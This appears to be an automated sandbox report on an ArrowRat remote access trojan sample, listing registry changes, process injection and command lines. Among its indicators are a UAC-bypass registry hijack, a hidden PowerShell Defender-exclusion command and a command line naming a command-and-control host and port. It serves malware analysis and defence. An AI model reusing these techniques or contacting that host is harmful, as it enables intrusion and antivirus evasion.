Malware Analysis Report

2024-10-10 10:37

Sample ID: 230731-c6dnpadc4s
Target: d7dea9816b882cb53d615a3afdf0c955.bin
SHA256: 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
Tags: client arrowrat persistence rat
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

Threat Level: Known bad

The file d7dea9816b882cb53d615a3afdf0c955.bin was found to be: Known bad.

Malicious Activity Summary

client arrowrat persistence rat

ArrowRat

Modifies WinLogon for persistence

Arrowrat family

Modifies Installed Components in the registry

Checks computer location settings

Enumerates connected drives

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-31 02:40

Signatures

Arrowrat family

arrowrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-31 02:40

Reported

2023-07-31 02:43

Platform

win7-20230712-en

Max time kernel

129s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"

Signatures

ArrowRat

rat arrowrat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open\command C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000_CLASSES\ms-settings\shell\open C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1212 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\explorer.exe
PID 2612 wrote to memory of 1492 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 1212 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1212 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\System32\ComputerDefaults.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe
"C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (10 instances, all with the same command line)
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\system32\ctfmon.exe
ctfmon.exe

C:\Windows\System32\ComputerDefaults.exe
"C:\Windows\System32\ComputerDefaults.exe"

Network

N/A

Files

memory/1212-54-0x0000000000B10000-0x0000000000B3E000-memory.dmp

memory/1212-55-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmp

memory/3024-57-0x0000000001D00000-0x0000000001D01000-memory.dmp

memory/1212-58-0x0000000000420000-0x00000000004A0000-memory.dmp

memory/2612-59-0x0000000003F60000-0x0000000003F61000-memory.dmp

memory/2612-67-0x00000000027B0000-0x00000000027C0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-31 02:40

Reported

2023-07-31 02:43

Platform

win10v2004-20230703-en

Max time kernel

141s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"

Signatures

ArrowRat

rat arrowrat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3872 set thread context of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133328613974282575" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
